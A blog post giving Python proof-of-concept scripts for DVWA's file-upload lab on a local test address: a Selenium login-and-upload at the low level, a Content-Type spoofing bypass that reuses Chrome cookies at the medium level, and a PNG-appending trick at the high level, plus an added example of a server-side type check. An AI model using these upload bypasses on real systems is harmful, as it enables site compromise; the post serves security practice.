POC——DVWA's File Upload

Level-Low

I recently got acquainted with Python's selenium, so I might as well use it to write a POC for the low level~

from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select

driver = Chrome()

# Log in to DVWA with the default credentials
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver, 10).until(lambda d: "Login" in d.title)
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/p/input').click()

# Open the DVWA Security page and set the level to "low"
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
level = Select(driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/select'))
level.select_by_value("low")
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/input[1]').click()

# Open the File Upload page, choose the test file and submit the form
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php')
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[3]').click()
response = driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/pre')

# On success the page echoes the stored path, which contains the original filename
expected = 'one.php'
flag = expected in response.text

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

# quit() ends the WebDriver session as well as closing the window
driver.quit()

 

Level-Medium

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import browser_cookie3

# Reuse the cookies of the DVWA session already logged in from Chrome
cookies = browser_cookie3.chrome()
URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/'

with open("one.php", "rb") as fl:
    # Build the multipart/form-data body; the file part is declared as image/png
    m = MultipartEncoder(
        fields={'MAX_FILE_SIZE': '100000',
                'uploaded': ('one.php', fl, 'image/png'),
                'Upload': 'Upload'
                })
    # The encoder supplies the Content-Type header including the boundary
    headers = {"Content-Type": m.content_type}
    response = requests.post(URL, data=m, headers=headers, cookies=cookies)

# On success the page echoes the stored path, which contains the original filename
expected = 'one.php'
flag = expected in response.text

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

Also: I ran into quite a few problems here, and just dealing with them took a long time, so I'm recording them now:

  • The browser's Content-Type here is multipart/form-data. This type is quite interesting and distinctive: the way POST parameters are passed does not change, except that the "key: value" form is replaced by a randomly generated string used as a boundary, and between the boundaries the various parameters and the binary file content are defined. So when constructing the POST request you need a multipart upload package (MultipartEncoder) (there are other ways; I used this one for convenience later on). Link here.
  • I saw that many multipart/form-data file uploads online use a token value, but I couldn't find one in the packet I captured. After looking it up online, it may be that DVWA does not define a token key here; but since the cookie also serves as authentication, it plays the same role. The difference between cookie, session and token goes here.
  • After requests sends the data, it is automatically URL-encoded.
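To make the multipart/form-data layout from the first note concrete, and to show why the declared Content-Type of a file part (the field the medium-level script fills with image/png) is something the server must verify rather than trust, here is an added example in Python. It is not code from the original post or from DVWA: the boundary string, field names and sample bytes are constructed for illustration, and check_upload is a hypothetical server-side check that compares the declared type with the file's magic bytes and an extension allowlist.

```python
"""Added example (not from the original post or from DVWA): builds a
multipart/form-data body by hand, parses it back the way a server would, and
shows that the per-part Content-Type header is client-supplied and must be
checked against the bytes. Boundary, field names and sample bytes are constructed."""
import os
import re

# A real client generates a random boundary; a fixed one keeps the layout readable.
BOUNDARY = "----ConstructedBoundary1234"

# Magic bytes for image types an upload form might accept (constructed allowlist).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def build_multipart(fields, boundary=BOUNDARY):
    """Encode form fields as multipart/form-data.

    fields maps a name to a str (plain field) or to a tuple
    (filename, data_bytes, declared_content_type) for a file part.
    Returns (Content-Type header value, body bytes)."""
    parts = []
    for name, value in fields.items():
        if isinstance(value, tuple):
            filename, data, ctype = value
            head = (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
                    f'Content-Type: {ctype}\r\n\r\n')
            parts.append(head.encode() + data)
        else:
            head = f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            parts.append(head.encode() + value.encode())
    # Each part is introduced by "--boundary"; the body ends with "--boundary--".
    body = b"".join(f"--{boundary}\r\n".encode() + p + b"\r\n" for p in parts)
    body += f"--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", body


def parse_multipart(content_type, body):
    """Split a multipart/form-data body into parts.
    Returns field name -> {"filename", "content_type", "data"}."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no boundary parameter in Content-Type")
    delim = ("--" + m.group(2)).encode()
    parts = {}
    for chunk in body.split(delim)[1:]:      # [0] is the (empty) preamble
        if chunk.startswith(b"--"):          # closing "--boundary--"
            break
        chunk = chunk[2:]                    # drop the CRLF after the delimiter
        header_blob, _, data = chunk.partition(b"\r\n\r\n")
        data = data[:-2]                     # drop the CRLF before the next delimiter
        headers = {}
        for line in header_blob.decode().split("\r\n"):
            key, _, val = line.partition(":")
            headers[key.strip().lower()] = val.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?:^|;)\s*name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts[name.group(1) if name else ""] = {
            "filename": fname.group(1) if fname else None,
            "content_type": headers.get("content-type"),
            "data": data,
        }
    return parts


def sniff_content_type(data):
    """Derive the type from the leading bytes instead of trusting the header."""
    for sig, ctype in MAGIC.items():
        if data.startswith(sig):
            return ctype
    return None


def check_upload(part):
    """Hypothetical server-side check: accept only if the extension is allowlisted
    and the declared Content-Type agrees with the magic bytes."""
    ext_ok = os.path.splitext(part["filename"] or "")[1].lower() in ALLOWED_EXT
    actual = sniff_content_type(part["data"])
    return ext_ok and actual is not None and actual == part["content_type"]


if __name__ == "__main__":
    # Constructed request with the same field names as the form, where a
    # non-image payload is declared as image/png.
    ct, body = build_multipart({
        "MAX_FILE_SIZE": "100000",
        "uploaded": ("one.php", b"<?php /* constructed placeholder */ ?>", "image/png"),
        "Upload": "Upload",
    })
    print(body.decode())
    part = parse_multipart(ct, body)["uploaded"]
    print("declared:", part["content_type"], "sniffed:", sniff_content_type(part["data"]),
          "accepted:", check_upload(part))
```

Running the block prints the raw body, so the boundary lines, the Content-Disposition header carrying the field name and filename, and the per-part Content-Type are visible as plain text. The parsed part still says image/png, exactly as the client declared it, while sniff_content_type finds no image signature; a check that relies on the declared type alone accepts it, and check_upload rejects it.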

 

Level-High

Here the only addition is an image-steganography step done in cmd, copy one.png /b + one.txt /a two.png (because the high level imposes a restriction on the file size), after which the newly obtained two.png is uploaded. This involves file inclusion later on, so I won't write it up here~

posted @ 2022-06-13 17:24 wavesky